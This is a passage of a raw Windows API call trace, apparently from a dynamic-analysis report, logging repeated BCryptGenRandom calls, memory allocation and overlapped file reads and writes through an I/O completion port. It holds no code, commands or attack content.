(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.674] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.674] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.674] free (_Block=0x77d800) [0081.674] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.674] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.674] free (_Block=0x1ff1930) [0081.674] free (_Block=0x1ff1a40) [0081.675] free (_Block=0x77d908) [0081.675] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.675] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.694] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.696] CloseHandle (hObject=0x3b4) returned 1 [0081.698] free (_Block=0x1fb18c0) [0081.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.713] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.713] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.713] free (_Block=0x77d800) [0081.713] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.713] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.714] free (_Block=0x1ff1930) [0081.714] free (_Block=0x1ff1a40) [0081.714] free (_Block=0x77d908) [0081.714] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.714] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.734] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.736] CloseHandle (hObject=0x3b4) returned 1 [0081.737] free (_Block=0x1fb18c0) [0081.737] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.749] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.749] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.750] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.750] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.750] free (_Block=0x77d800) [0081.750] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.750] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.751] free (_Block=0x1ff1930) [0081.751] free (_Block=0x1ff1a40) [0081.751] free (_Block=0x77d908) [0081.751] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.751] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.752] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.779] CloseHandle (hObject=0x3c4) returned 1 [0081.780] free (_Block=0x1ff1e60) [0081.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.792] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.792] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.792] free (_Block=0x77d800) [0081.792] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.792] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.793] free (_Block=0x1ff1930) [0081.793] free (_Block=0x1ff1a40) [0081.793] free (_Block=0x77d908) [0081.793] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.794] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.812] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x578, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.812] CloseHandle (hObject=0x3c4) returned 1 [0081.818] free (_Block=0x1ff1e60) [0081.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.828] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.830] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.830] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.830] free (_Block=0x77d800) [0081.830] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.830] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.830] free (_Block=0x1ff1930) [0081.831] free (_Block=0x1ff1a40) [0081.831] free (_Block=0x77d908) [0081.831] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.835] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8c20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.888] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xb090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.930] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a88, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0081.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0081.970] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.970] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.970] free (_Block=0x77d800) [0081.970] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0081.970] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0081.970] free (_Block=0x3db00b8) [0081.970] free (_Block=0x3db01c8) [0081.970] free (_Block=0x77d908) [0081.970] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0081.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0081.989] ReadFile (in: hFile=0x3bc, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x946, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0081.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.013] ReadFile (in: hFile=0x3b8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x6bbd, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0082.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.037] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.161] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x4f80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.171] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x390d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.208] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0xc47, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.220] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.220] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.220] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.221] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.221] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.221] free (_Block=0x77d800) [0082.221] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.221] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.222] free (_Block=0x1ff1930) [0082.222] free (_Block=0x1ff1a40) [0082.222] free (_Block=0x77d908) [0082.222] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.238] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.238] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.238] free (_Block=0x77d800) [0082.238] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.238] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.239] free (_Block=0x1ff1930) [0082.239] free (_Block=0x1ff1a40) [0082.239] free (_Block=0x77d908) [0082.239] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.256] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.256] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.256] free (_Block=0x77d800) [0082.256] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.256] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.256] free (_Block=0x1ff1930) [0082.256] free (_Block=0x1ff1a40) [0082.256] free (_Block=0x77d908) [0082.257] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.258] CloseHandle (hObject=0x3bc) returned 1 [0082.258] free (_Block=0x1fb18c0) [0082.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.259] CloseHandle (hObject=0x3c4) returned 1 [0082.260] free (_Block=0x3d70048) [0082.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.283] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.329] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.329] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 